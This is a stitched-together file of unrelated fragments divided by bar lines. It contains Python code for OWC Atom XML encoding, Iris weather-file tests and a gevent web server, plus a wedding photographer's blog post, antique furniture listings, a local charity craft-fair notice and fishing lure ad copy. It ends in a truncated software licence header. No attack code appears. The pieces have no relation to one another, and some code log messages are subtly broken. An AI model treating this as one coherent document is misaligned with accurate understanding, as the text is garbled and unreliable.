    :param d: dict with optional keys 'pixelWidth', 'pixelHeight',
        'mmPerPixel'
    :return: the Element, or None if *d* is empty or encoding fails
    """
    # <owc:display>
    #   <owc:pixelWidth>
    if is_empty(d):
        return None
    try:
        display = etree.Element(ns_elem("owc", "display"), nsmap=ns)
        # Each entry becomes an owc child element; ints for the pixel
        # dimensions, float for the physical pixel size.
        for key, convert in (('pixelWidth', try_int),
                             ('pixelHeight', try_int),
                             ('mmPerPixel', try_float)):
            value = convert(extract_p(key, d, None))
            if value is not None:
                etree.SubElement(display, ns_elem("owc", key)).text = str(value)
        return display
    except Exception as ex:
        log.warn('could encode creator_display', ex)
        return None
def axml_link(d):
    """Encode an OwcLink dict as an Atom <link> element.

    :param d: dict with optional keys 'href', 'rel', 'type', 'lang',
        'title' and 'length'
    :return: the Element, or None if *d* is empty or encoding fails
    """
    # <link rel="via" type="application/xml" href="..." title="..."
    if is_empty(d):
        return None
    try:
        link = etree.Element("link", nsmap=ns)
        # String-valued entries map one-to-one onto XML attributes.
        for key in ('href', 'rel', 'type', 'lang', 'title'):
            value = extract_p(key, d, None)
            if value is not None:
                link.set(key, value)
        # 'length' is numeric and must be serialised explicitly.
        length = try_int(extract_p('length', d, None))
        if length is not None:
            link.set("length", str(length))
        return link
    except Exception as ex:
        log.warn('could not encode link', ex)
        return None
def axml_category(d):
    """Encode an OwcCategory dict as an Atom <category> element.

    :param d: dict with optional keys 'term', 'scheme' and 'label'
    :return: the Element, or None if *d* is empty or encoding fails
    """
    # <category term="maps" label="This file contains maps"/>
    if is_empty(d):
        return None
    try:
        category = etree.Element("category", nsmap=ns)
        # Each entry maps one-to-one onto an XML attribute of the
        # same name.
        for key in ('term', 'scheme', 'label'):
            value = extract_p(key, d, None)
            if value is not None:
                category.set(key, value)
        return category
    except Exception as ex:
        log.warn('could encode category', ex)
        return None
def axml_author(d):
    """Encode an OwcAuthor dict as an Atom <author> element.

    :param d: dict with optional keys 'name', 'email' and 'uri'
    :return: the Element, or None if *d* is empty or encoding fails
    """
    # <author>
    #   <name>
    #   <email>
    if is_empty(d):
        return None
    try:
        author = etree.Element("author", nsmap=ns)
        # Each entry becomes a child element carrying the value as text.
        for key in ('name', 'email', 'uri'):
            value = extract_p(key, d, None)
            if value is not None:
                etree.SubElement(author, key).text = value
        return author
    except Exception as ex:
        log.warn('could encode author', ex)
        return None
def axml_offering(d):
    """Encode an OwcOffering dict as an <owc:offering> element.

    :param d: dict with a 'code' key and optional 'operations',
        'contents' and 'styles' lists
    :return: the Element, or None if *d* is empty or encoding fails
    """
    # <owc:offering code="http://www.opengis.net/spec/owc-at...">
    #   <owc:content type="application/gml+xml">
    if is_empty(d):
        return None
    try:
        code = extract_p('code', d, None)
        offering = etree.Element(ns_elem("owc", "offering"),
                                 attrib={"code": code}, nsmap=ns)
        # Encode the nested collections in document order, dropping any
        # entries their encoders could not handle.
        for key, encode in (('operations', axml_operation),
                            ('contents', axml_content),
                            ('styles', axml_styleset)):
            for item in extract_p(key, d, []):
                child = encode(item)
                if child is not None:
                    offering.append(child)
        return offering
    except Exception as ex:
        log.warn('could encode offering', ex)
        return None
def axml_operation(d):
    """Encode an OwcOperation dict as an <owc:operation> element.

    :param d: dict with optional keys 'code', 'method', 'type', 'href',
        and nested 'request'/'result' content dicts
    :return: the Element, or None if *d* is empty or encoding fails
    """
    # <owc:operation code="GetCapabilities" method="GET"
    #                type="applica..." href="..."
    #   <owc:request type="application/xml"> ..
    if is_empty(d):
        return None
    try:
        operation = etree.Element(ns_elem("owc", "operation"), nsmap=ns)
        # Scalar entries map one-to-one onto XML attributes.
        for key in ('code', 'method', 'type', 'href'):
            value = extract_p(key, d, None)
            if value is not None:
                operation.set(key, value)
        # Nested request/result payloads are encoded via axml_content.
        for key in ('request', 'result'):
            payload = extract_p(key, d, None)
            child = None if payload is None else axml_content(payload)
            if child is not None:
                operation.append(child)
        return operation
    except Exception as ex:
        log.warn('could encode operation', ex)
        return None
def axml_styleset(d):
    """Encode an OwcStyleSet dict as an <owc:styleSet> element.

    :param d: dict with optional keys 'name', 'title', 'abstract',
        'default', 'legendURL' and a nested 'content' dict
    :return: the Element, or None if *d* is empty or encoding fails
    """
    # <owc:styleSet>
    #   <owc:name>raster</owc:name>
    #   <owc:title>Default Raster</owc:title>
    #   <owc:abstract>A sample style that draws a </owc:abstract>
    #   <owc:legendURL href="h...." type="image/png"/>
    # </owc:styleSet>
    if is_empty(d):
        return None
    try:
        styleset = etree.Element(ns_elem("owc", "styleSet"), nsmap=ns)
        # Text-valued entries become owc child elements of the same name.
        # TODO no examples for the 'default' and 'content' settings.
        for key in ('name', 'title', 'abstract', 'default', 'legendURL'):
            value = extract_p(key, d, None)
            if value is not None:
                etree.SubElement(styleset, ns_elem("owc", key)).text = value
        content = extract_p('content', d, None)
        child = None if content is None else axml_content(content)
        if child is not None:
            styleset.append(child)
        return styleset
    except Exception as ex:
        log.warn('could encode styleset', ex)
        return None
def axml_content(d):
    """
    OwcContent dict to Atom XML.

    :param d: dict with optional keys 'type', 'url', 'title' and
        'content' (inline content as text)
    :return: an <owc:content> Element, or None if *d* is empty or
        encoding fails
    """
    # <owc:content type="image/tiff" href=".."
    if is_empty(d):
        return None
    else:
        try:
            content_elem = etree.Element(ns_elem("owc", "content"), nsmap=ns)
            mimetype = extract_p('type', d, None)
            if mimetype is not None:
                content_elem.set("type", mimetype)
            url = extract_p('url', d, None)
            if url is not None:
                content_elem.set("href", url)
            title = extract_p('title', d, None)
            if title is not None:
                content_elem.set("title", title)
            content = extract_p('content', d, None)
            # BUG FIX: the original condition was inverted ("is None"),
            # so inline content was never written and the element text was
            # instead set to None whenever content was absent.
            if content is not None:
                content_elem.text = content
            return content_elem
        except Exception as ex:
            log.warn('could not encode content', ex)
            return None
|
As a wedding photographer, one of my goals is to get to know my couples before the wedding day, so I know how to best serve them and capture their moments on their wedding day for them. Sometimes that means photographing an engagement session, or having Skype calls, or simply texting. No matter what, though, it's important to me as a photographer to understand my couple before the wedding, and since Cord + Haley live in Alabama, we had the chance to chat on the phone, but I hadn't met them personally before the wedding day. But, when I arrived that morning and met them for the first time, it was as though we were already friends, and their trust was amazing. Their friends and family were absolutely incredible, and having met Haley's mother at a tasting at Top of the Market a few weeks before, it was a blast getting to meet more of their loved ones and see why they were so important to the two of them. First up, getting ready was underway, which looked slightly different between the bride and the groom!
One of the most fun parts of the day as a wedding photographer is the getting ready process; it's when we meet the wedding party, and when many fun events happen that really tell the wedding day story. For Cord, it was starting with a fun game of pickup football in a field near the hotel with his groomsmen, ushers, and friends. Cord is a quarterback at Auburn University, and many of his friends are exceptional athletes, so it was actually quite fun to capture their game. And, thanks to having an incredible second photographer with me for their wedding day (Chad Winstead of Winstead Photo), while they played football, I headed to hang with Haley and her crew back at the hotel, who were just as fun! Photographing Haley and her bridesmaids was great; they were easy going, hilarious, and Whitley, one of her flower girls, was an absolute hoot. I mean, really, when you meet someone who allows you to hop up on their bed, straddle them, and start taking photos of them lounging around after only 20 minutes of interaction, you know it’s going to be a fantastic day! Laughter abounded, and everyone was truly a joy to get to know. And, when it was time to head to Top of the Market for the wedding, it was only a five minute drive away. Perfect!
One of the cool things about Top of the Market as a wedding venue is that it boasts two spaces for weddings: the loft upstairs, and the warehouse downstairs. I've photographed plenty of weddings in both, but never have I had a wedding where both were used for a single wedding! It was incredible, and a really wonderful way to keep the pace going throughout the evening. When we arrived, we headed upstairs for the ceremony, where it had been beautifully adorned with florals from Haley's Aunt Lori. The warmth and welcoming feel was tangible, and it was elegant from start to finish. But, before the ceremony began, Cord + Haley exchanged letters...and proceeded to have us all in tears from how they both seek to love the other so unconditionally. Tears flowed as they prayed together -- but from around corners, so as to not see one another before the ceremony -- then parted ways until it was time to come down the aisle.
And talk about an amazing ceremony! Haley's brother officiated, and I'm not sure there was a dry eye in the house as all eyes turned to Haley coming down the aisle to Cord, who was amazed by his stunning bride. It was a beautiful ceremony, and celebration rang out as they were announced Mr. & Mrs.!
But, as with all amazing weddings at Top of the Market, I would be remiss to not touch on what transpired after the ceremony, which was one of the most epic dance parties I have ever seen! Cord + Haley started the party off right, with Haley using her bouquet to throw a touchdown pass to Cord on the Dance floor during their entrance, and from there, it all was hilarious, no-holds-barred shenaniganry for the remainder of the night. Imaginary jump rope dance offs ensued, photo booth props found their way to the dance floor, shirts were lost in the course of the night, and even late night pizza deliveries occurred. And, from start to finish, these two, along with their loved ones, celebrated the start of their newest adventure together in the best fashion possible: together!
And, I must give a huge, huge thank you to Chad for coming from North Carolina to photograph this wedding with me. He is one of my dear friends, and after having celebrated his own wedding with another one of my friends, Beth, (and his better half...don't worry, he knows it!) it was a treat to get to work alongside him on a wedding. This guy is incredible, and I want to thank him for his tireless work and creative eye from start to finish on this one. Let's do it again soon!
|
import logging
logger = logging.getLogger(__name__)
class StatusMessage:
    """Bit-flag accumulator for job status messages.

    Flags may be OR-ed together into ``self.message``; ``contains``
    queries individual flags and ``str()`` renders the set flags.
    """

    # Individual flag bits (NO_MESSAGE is the empty mask).
    NO_MESSAGE = 0x0
    SUCCEEDED = 0x1 << 0
    SUBMIT_DISABLED = 0x1 << 1
    FAILED = 0x1 << 2
    INVALID_EXE = 0x1 << 3

    # All recognised flags, used for validation and rendering order.
    message_list = [
        NO_MESSAGE,
        SUCCEEDED,
        SUBMIT_DISABLED,
        FAILED,
        INVALID_EXE,
    ]

    # Human-readable text for each flag.
    message_text = {
        NO_MESSAGE: 'no message',
        SUCCEEDED: 'succeeded',
        SUBMIT_DISABLED: 'submission disabled',
        FAILED: 'failed',
        INVALID_EXE: 'invalid executable',
    }

    def __init__(self):
        # Start with no flags set.
        self.message = StatusMessage.NO_MESSAGE

    def __str__(self):
        # Render the text of every flag currently set in the bitmask.
        set_flags = [StatusMessage.message_text[flag]
                     for flag in StatusMessage.message_list
                     if flag & self.message]
        return str(set_flags)

    def contains(self, flag):
        """Return True if *flag* is a known flag that is currently set."""
        if flag not in StatusMessage.message_list:
            logger.warning('Invalid Flag passed')
            return False
        return bool(self.message & flag)
|
Antique Swedish Baroque period secretary; 18th century painted in light blue with white interior.
Secretary is in two sections. The upper section has three shelves behind panel doors. The lower section has a slanted front with additional small drawers and secret compartments. Two small drawers and three large drawers are below. Secretary has original locks and hinges.
Secretary is in very good condition for its age. The distressed paint has been refreshed; there are normal age cracks in the wood finish.
Antique Swedish Gustavian style cabinet painted distressed Swedish white color. Lovely carved crown molding. One raised panel original glass door with lock and key.
Very nice sized Swedish antique drop-leaf table in original paint and a wonderful patina.
Large pair of antique Swedish Gustavian style painted chests with diamond carving, late 19th century. Three-drawer chests with faux finish gray marble tops.
Pair of antique Swedish Gustavian style painted X-base stools, early 19th century. Painted in a Swedish grey distressed finish, with a lovely acanthus leaf border below the upholstery.
© 2017-2018 Scandinavian Antiques & Living Website Design by: MvP Tech Inc.
|
# (C) British Crown Copyright 2010 - 2013, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""
Test the Fieldsfile file loading plugin and FFHeader.
"""
# import iris tests first so that some things can be initialised before
# importing anything else
import iris.tests as tests
import collections
import warnings
import mock
import numpy as np
import iris
import iris.fileformats.ff as ff
import iris.fileformats.pp as pp
# Minimal stand-ins for PP field / packing objects, carrying only the
# attributes that the payload-size tests below read.
_MockField = collections.namedtuple('_MockField',
                                    'lbext,lblrec,lbnrec,lbpack,lbuser')
_MockLbpack = collections.namedtuple('_MockLbpack', 'n1')

# PP-field: LBPACK N1 values.
_UNPACKED = 0
_WGDOS = 1
_CRAY = 2
_GRIB = 3  # Not implemented.
_RLE = 4  # Not supported, deprecated FF format.

# PP-field: LBUSER(1) values.
_REAL = 1
_INTEGER = 2
_LOGICAL = 3  # Not implemented.
class TestFF_HEADER(tests.IrisTest):
    """Sanity checks on the static FF_HEADER field-description table."""

    def test_initialisation(self):
        # Spot-check the first and an interior entry of the header layout.
        self.assertEqual(ff.FF_HEADER[0], ('data_set_format_version', (0,)))
        self.assertEqual(ff.FF_HEADER[17], ('integer_constants', (99, 100)))

    def test_size(self):
        # The fixed-length header description defines exactly 31 components.
        self.assertEqual(len(ff.FF_HEADER), 31)
@iris.tests.skip_data
class TestFFHeader(tests.IrisTest):
    """Checks FFHeader attribute decoding against a known FieldsFile."""

    def setUp(self):
        self.filename = tests.get_data_path(('FF', 'n48_multi_field'))
        self.ff_header = ff.FFHeader(self.filename)
        # Header components expected to be populated for this file.
        self.valid_headers = (
            'integer_constants', 'real_constants', 'level_dependent_constants',
            'lookup_table', 'data'
        )
        # Header components expected to be absent (None) for this file.
        self.invalid_headers = (
            'row_dependent_constants', 'column_dependent_constants',
            'fields_of_constants', 'extra_constants', 'temp_historyfile',
            'compressed_field_index1', 'compressed_field_index2',
            'compressed_field_index3'
        )

    def test_constructor(self):
        """Test FieldsFile header attribute lookup."""
        # Scalar header words; expected values come from the test file.
        # -32768 below appears to be the integer missing-data indicator
        # for this format -- NOTE(review): confirm against the FF spec.
        self.assertEqual(self.ff_header.data_set_format_version, 20)
        self.assertEqual(self.ff_header.sub_model, 1)
        self.assertEqual(self.ff_header.vert_coord_type, 5)
        self.assertEqual(self.ff_header.horiz_grid_type, 0)
        self.assertEqual(self.ff_header.dataset_type, 3)
        self.assertEqual(self.ff_header.run_identifier, 0)
        self.assertEqual(self.ff_header.experiment_number, -32768)
        self.assertEqual(self.ff_header.calendar, 1)
        self.assertEqual(self.ff_header.grid_staggering, 3)
        self.assertEqual(self.ff_header.time_type, -32768)
        self.assertEqual(self.ff_header.projection_number, -32768)
        self.assertEqual(self.ff_header.model_version, 802)
        self.assertEqual(self.ff_header.obs_file_type, -32768)
        self.assertEqual(self.ff_header.last_fieldop_type, -32768)
        # Validity times decode as (year, month, day, hour, min, sec, ...).
        self.assertEqual(self.ff_header.first_validity_time,
                         (2011, 7, 10, 18, 0, 0, 191))
        self.assertEqual(self.ff_header.last_validity_time,
                         (2011, 7, 10, 21, 0, 0, 191))
        self.assertEqual(self.ff_header.misc_validity_time,
                         (2012, 4, 30, 18, 12, 13, -32768))
        # Populated table components expose numpy-style shapes.
        self.assertEqual(self.ff_header.integer_constants.shape, (46, ))
        self.assertEqual(self.ff_header.real_constants.shape, (38, ))
        self.assertEqual(self.ff_header.level_dependent_constants.shape,
                         (71, 8))
        # Components not present in this file must decode to None.
        self.assertIsNone(self.ff_header.row_dependent_constants)
        self.assertIsNone(self.ff_header.column_dependent_constants)
        self.assertIsNone(self.ff_header.fields_of_constants)
        self.assertIsNone(self.ff_header.extra_constants)
        self.assertIsNone(self.ff_header.temp_historyfile)
        self.assertIsNone(self.ff_header.compressed_field_index1)
        self.assertIsNone(self.ff_header.compressed_field_index2)
        self.assertIsNone(self.ff_header.compressed_field_index3)
        # Pointer-style components decode to (start, length, ...) tuples.
        self.assertEqual(self.ff_header.lookup_table, (909, 64, 5))
        self.assertEqual(self.ff_header.total_prognostic_fields, 3119)
        self.assertEqual(self.ff_header.data, (2049, 2961, -32768))

    def test_str(self):
        # The string form is compared against a stored reference file.
        self.assertString(str(self.ff_header), ('FF', 'ffheader.txt'))

    def test_repr(self):
        # repr() embeds the source filename.
        target = "FFHeader('" + self.filename + "')"
        self.assertEqual(repr(self.ff_header), target)

    def test_shape(self):
        # shape() reports the dimensions recorded for a named component.
        self.assertEqual(self.ff_header.shape('data'), (2961, -32768))
@iris.tests.skip_data
class TestFF2PP2Cube(tests.IrisTest):
    """Checks that a FieldsFile loads into the expected set of cubes."""

    def setUp(self):
        self.filename = tests.get_data_path(('FF', 'n48_multi_field'))

    def test_unit_pass_0(self):
        """Test FieldsFile to PPFields cube load."""
        # Count repeated standard names so each cube gets a unique
        # reference CML filename (e.g. 'air_temperature_2.cml').
        occurrences = collections.defaultdict(int)
        for cube in iris.load(self.filename):
            name = cube.standard_name
            occurrences[name] += 1
            reference = '{}_{}.cml'.format(name, occurrences[name])
            self.assertCML(cube, ('FF', reference))
@iris.tests.skip_data
class TestFFieee32(tests.IrisTest):
    """Checks 32-bit IEEE FieldsFiles load identically to 64-bit ones."""

    def test_iris_loading(self):
        fname32 = tests.get_data_path(('FF', 'n48_multi_field.ieee32'))
        fname64 = tests.get_data_path(('FF', 'n48_multi_field'))
        cubes32 = iris.load(fname32)
        cubes64 = iris.load(fname64)
        for cube32, cube64 in zip(cubes32, cubes64):
            # Touch .data so the comparison covers realised payloads too.
            _, _ = cube32.data, cube64.data
            self.assertEqual(cube32, cube64)
@iris.tests.skip_data
class TestFFVariableResolutionGrid(tests.IrisTest):
    """Checks x/y coordinate selection for variable-resolution grids."""

    def setUp(self):
        self.filename = tests.get_data_path(('FF', 'n48_multi_field'))
        self.ff2pp = ff.FF2PP(self.filename)
        self.ff_header = self.ff2pp._ff_header
        # Synthesise wavy (variable-resolution) longitudes/latitudes;
        # column 0 holds the grid values, column 1 their midpoints.
        data_shape = (73, 96)
        delta = np.sin(np.linspace(0, np.pi * 5, data_shape[1])) * 5
        lons = np.linspace(0, 180, data_shape[1]) + delta
        lons = np.vstack([lons[:-1], lons[:-1] + 0.5 * np.diff(lons)]).T
        lons = np.reshape(lons, lons.shape, order='F')
        delta = np.sin(np.linspace(0, np.pi * 5, data_shape[0])) * 5
        lats = np.linspace(-90, 90, data_shape[0]) + delta
        lats = np.vstack([lats[:-1], lats[:-1] + 0.5 * np.diff(lats)]).T
        lats = np.reshape(lats, lats.shape, order='F')
        # Install the synthetic constants on the real file's header.
        self.ff_header.column_dependent_constants = lons
        self.ff_header.row_dependent_constants = lats
        # Expected coordinates for each staggered grid type.
        self.U_grid_x = lons[:, 1]
        self.V_grid_y = lats[:-1, 1]
        self.P_grid_x = lons[:, 0]
        self.P_grid_y = lats[:, 0]
        self.orig_make_pp_field = pp.make_pp_field

        def new_make_pp_field(header_values):
            # Force the stash under test onto each field, and set
            # bdx/bdy to the missing-data value so the variable
            # resolution coordinates are used instead.
            field = self.orig_make_pp_field(header_values)
            field.stash = self.ff2pp._custom_stash
            field.bdx = field.bdy = field.bmdi
            return field

        # Replace the pp module function with this new function;
        # this gets called in PP2FF.  Restored in tearDown.
        pp.make_pp_field = new_make_pp_field

    def tearDown(self):
        # Undo the module-level monkey-patch from setUp.
        pp.make_pp_field = self.orig_make_pp_field

    def _check_stash(self, stash, x_coord, y_coord):
        # Load the first field with the given stash and compare its
        # x/y coordinate arrays against the expected grids.
        self.ff2pp._custom_stash = stash
        field = next(iter(self.ff2pp))
        self.assertArrayEqual(x_coord, field.x, ('x_coord was incorrect for '
                                                 'stash {}'.format(stash)))
        self.assertArrayEqual(y_coord, field.y, ('y_coord was incorrect for '
                                                 'stash {}'.format(stash)))

    def test_p(self):
        # P grid: unstaggered in both directions.
        self._check_stash('m01s00i001', self.P_grid_x, self.P_grid_y)

    def test_u(self):
        # U grid: staggered in x only.
        self._check_stash('m01s00i002', self.U_grid_x, self.P_grid_y)

    def test_v(self):
        # V grid: staggered in y only.
        self._check_stash('m01s00i003', self.P_grid_x, self.V_grid_y)

    def test_unhandled_grid_type(self):
        # Unknown grid codes fall back to the P grid with a warning.
        with mock.patch('warnings.warn') as warn_fn:
            self._check_stash('m01s00i005', self.P_grid_x, self.P_grid_y)
            self.assertIn("Assuming the data is on a P grid.",
                          warn_fn.call_args[0][0])
class TestFFPayload(tests.IrisTest):
    """Exercises FF2PP._payload() depth/dtype results per packing scheme."""

    @staticmethod
    def _field(lbext, lblrec, lbnrec, packing, user_type):
        # Assemble a minimal mock PP field with the given packing settings.
        return _MockField(lbext=lbext, lblrec=lblrec, lbnrec=lbnrec,
                          lbpack=_MockLbpack(packing),
                          lbuser=[user_type])

    @staticmethod
    def _word_dtype(user_type):
        # Unpacked fields report the 8-byte (word_depth) numpy dtype.
        return np.dtype(
            ff._LBUSER_DTYPE_LOOKUP[user_type].format(word_depth=8))

    def _test_payload(self, mock_field, expected_depth, expected_type):
        # FFHeader is patched out so FF2PP never touches the filesystem.
        with mock.patch('iris.fileformats.ff.FFHeader') as mock_header:
            mock_header.return_value = None
            ff2pp = ff.FF2PP('Not real')
            data_depth, data_type = ff2pp._payload(mock_field)
            self.assertEqual(data_depth, expected_depth)
            self.assertEqual(data_type, expected_type)

    # --- Unpacked fields (depth measured from lblrec minus lbext). ---

    def test_payload_unpacked_real(self):
        field = self._field(0, 100, -1, _UNPACKED, _REAL)
        self._test_payload(field, 800, self._word_dtype(_REAL))

    def test_payload_unpacked_real_ext(self):
        field = self._field(50, 100, -1, _UNPACKED, _REAL)
        self._test_payload(field, 400, self._word_dtype(_REAL))

    def test_payload_unpacked_integer(self):
        field = self._field(0, 200, -1, _UNPACKED, _INTEGER)
        self._test_payload(field, 1600, self._word_dtype(_INTEGER))

    def test_payload_unpacked_integer_ext(self):
        field = self._field(100, 200, -1, _UNPACKED, _INTEGER)
        self._test_payload(field, 800, self._word_dtype(_INTEGER))

    # --- WGDOS-packed fields (depth derived from lbnrec). ---

    def test_payload_wgdos_real(self):
        field = self._field(0, -1, 100, _WGDOS, _REAL)
        self._test_payload(field, 796, pp.LBUSER_DTYPE_LOOKUP[_REAL])

    def test_payload_wgdos_real_ext(self):
        field = self._field(50, -1, 100, _WGDOS, _REAL)
        self._test_payload(field, 796, pp.LBUSER_DTYPE_LOOKUP[_REAL])

    def test_payload_wgdos_integer(self):
        field = self._field(0, -1, 200, _WGDOS, _INTEGER)
        self._test_payload(field, 1596, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])

    def test_payload_wgdos_integer_ext(self):
        field = self._field(100, -1, 200, _WGDOS, _INTEGER)
        self._test_payload(field, 1596, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])

    # --- Cray-packed fields (half the depth of the unpacked cases). ---

    def test_payload_cray_real(self):
        field = self._field(0, 100, -1, _CRAY, _REAL)
        self._test_payload(field, 400, pp.LBUSER_DTYPE_LOOKUP[_REAL])

    def test_payload_cray_real_ext(self):
        field = self._field(50, 100, -1, _CRAY, _REAL)
        self._test_payload(field, 200, pp.LBUSER_DTYPE_LOOKUP[_REAL])

    def test_payload_cray_integer(self):
        field = self._field(0, 200, -1, _CRAY, _INTEGER)
        self._test_payload(field, 800, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])

    def test_payload_cray_integer_ext(self):
        field = self._field(100, 200, -1, _CRAY, _INTEGER)
        self._test_payload(field, 400, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
    tests.main()
|
The Outer Banks Woman’s Club is one of those organizations that seem to fall into the background, don’t get a lot of publicity but keep doing good works over and over again.
These are the folks that always seem to be the ones who find ways to give to local causes like the Outer Banks Relief Foundation, the Beach Food Pantry and Food for Thought or the V.I.P Fishing Tournament that was just held.
Now that it’s the holiday season they’re really taking it up a notch with their Annual Angel Gift Program that reaches out to local children who may not have gifts otherwise.
It’s really grassroots funding which is what their Arts and Craft Christmas Fair is all about. It’s coming up Friday and Saturday, November 28 and 29 over Thanksgiving Weekend at the Baum Center in Kill Devil Hills.
Admission is only $1.00, proceeds go to making sure as many children as possible have something from that “fat jolly old elf”-that’s a quote from A Visit from St. Nicholas for those who have forgotten about the night before Christmas. The funds also go into a scholarship fund.
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import logging
import gevent
import bottle
from gevent import pywsgi
from ava.runtime import config
from ava.runtime import environ
logger = logging.getLogger(__name__)
_CONF_SECTION = 'webfront'
class ApplicationDispatcher(object):
    """Allows one to mount middlewares or applications in a WSGI application.

    Each request is dispatched to the mounted app whose mount path is the
    longest prefix of PATH_INFO; otherwise the default app handles it.
    """

    def __init__(self, app, mounts=None):
        # app: the default WSGI application used when no mount matches.
        # mounts: optional mapping of path prefix (bytes) -> WSGI app.
        self.app = app
        self.mounts = mounts or {}

    def __call__(self, environ, start_response):
        # Find the longest registered prefix of PATH_INFO, peeling one
        # path segment off the end per iteration.
        # NOTE(review): byte-string environ keys and the str '' initial
        # value of path_info suggest this targets Python 2 -- confirm.
        script = environ.get(b'PATH_INFO', b'')
        path_info = ''
        while b'/' in script:
            if script in self.mounts:
                app = self.mounts[script]
                break
            script, last_item = script.rsplit(b'/', 1)
            path_info = b'/%s%s' % (last_item, path_info)
        else:
            # No '/' left: either an exact mount match or the default app.
            app = self.mounts.get(script, self.app)
        # Shift the matched prefix from PATH_INFO onto SCRIPT_NAME, per
        # the WSGI convention for mounted applications.
        original_script_name = environ.get(b'SCRIPT_NAME', b'')
        environ[b'SCRIPT_NAME'] = original_script_name + script
        environ[b'PATH_INFO'] = path_info
        return app(environ, start_response)

    def attach_app(self, path, app):
        # Mount a WSGI app at the given path prefix.
        self.mounts[path] = app

    def detach_app(self, path):
        # Unmount the app at the given path prefix, if present.
        app = self.mounts.get(path)
        if app is not None:
            del self.mounts[path]
# The global web application: wraps the default bottle app so extension
# apps can be mounted/unmounted at runtime via attach_app()/detach_app().
dispatcher = ApplicationDispatcher(bottle.app())
class WebfrontEngine(object):
    """
    The client-facing web interface.

    Serves the global ``dispatcher`` WSGI application over plain HTTP
    and/or HTTPS, as configured in the 'webfront' section.
    """

    def __init__(self):
        logger.debug("Initializing webfront engine...")
        self._http_listener = None
        self._https_listener = None
        # Defaults; overwritten from configuration in start().
        self.listen_port = 5000
        self.listen_addr = '127.0.0.1'
        self.secure_listen_port = 0  # 0 means the HTTPS listener is not bound
        self.local_base_url = "http://127.0.0.1:%d/" % (self.listen_port,)

    def start(self, ctx=None):
        """Read configuration and spawn the HTTP/HTTPS listener greenlets.

        ctx must provide add_child_greenlet(); a port of 0 disables the
        corresponding listener.
        """
        logger.debug("Starting webfront engine...")
        self.listen_port = config.agent().getint(_CONF_SECTION, 'listen_port')
        self.listen_addr = config.agent().get(_CONF_SECTION, 'listen_addr')
        self.secure_listen_port = config.agent().getint(_CONF_SECTION, 'secure_listen_port')
        self.local_base_url = "http://127.0.0.1:%d/" % (self.listen_port,)
        logger.debug("Local base URL:%s", self.local_base_url)
        if self.listen_port != 0:
            ctx.add_child_greenlet(gevent.spawn(self._run_http))
        if self.secure_listen_port != 0:
            ctx.add_child_greenlet(gevent.spawn(self._run_https))
        logger.debug("Webfront engine started.")

    def stop(self, ctx=None):
        # NOTE(review): the listeners are not explicitly closed here --
        # presumably ctx tears down the child greenlets; confirm.
        logger.debug("Webfront engine stopped.")

    def _run_https(self):
        """Blocking greenlet target: serve ``dispatcher`` over HTTPS."""
        logger.debug("Webfront engine(HTTPS) is running...")
        conf_dir = environ.conf_dir()
        # TLS key/certificate are expected in the agent's config directory.
        keyfile = os.path.join(conf_dir, 'ava.key')
        certfile = os.path.join(conf_dir, 'ava.crt')
        self._https_listener = pywsgi.WSGIServer((self.listen_addr, self.secure_listen_port),
                                                 dispatcher,
                                                 keyfile=keyfile,
                                                 certfile=certfile)
        logger.debug("Webfront engine(HTTPS) is listening on port: %d", self._https_listener.address[1])
        self._https_listener.serve_forever()

    def _run_http(self):
        """Blocking greenlet target: serve ``dispatcher`` over plain HTTP."""
        logger.debug("Webfront engine(HTTP) is running...")
        self._http_listener = pywsgi.WSGIServer((self.listen_addr, self.listen_port),
                                                dispatcher)
        logger.debug("Webfront engine(HTTP) is listening on port: %d", self._http_listener.address[1])
        self._http_listener.serve_forever()
|
T-HEX METAL LURES From Cape Cod to Cape Hatteras, these metals are a proven winner. For Stripers, Bluefish, Weakfish, Spanish Mackerel, Bonito, False Albies and Fluke. For casting, jigging, trolling; Beach, boat and jetty. Multi faceted body to catch and reflect more light. Great action throughout the water column. Imitates many of the baitfish found along the East Coast. Such as: Sandeels, Spearing-Rainfish, Finger Mullet, Peanut Bunker, etc. Will Out-cast and Out-catch every other tin in your bag! Precision Machined from Solid Brass, plated with a Bright, Durable Nickel/Chro..
A.O.K. T-HEX with TubeTail Hooks and Spro Power Swivels From Cape Cod to Cape Hatteras, these metals are a proven winner. For Stripers, Bluefish, Weakfish, Spanish Mackerel, Bonito, False Albies and Fluke. For casting, jigging, trolling; Beach, boat and jetty. Multi faceted body to catch and reflect more light. Great action throughout the water column. Imitates many of the baitfish found along the East Coast. Such as: Sandeels, Spearing-Rainfish, Finger Mullet, Peanut Bunker, etc. Will Out-cast and Out-catch every other tin in your bag! Precision Machined from Solid Brass, p..
|
# *- coding: utf-8 -*-
""" Sahana Eden Project Model
@copyright: 2011-2013 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
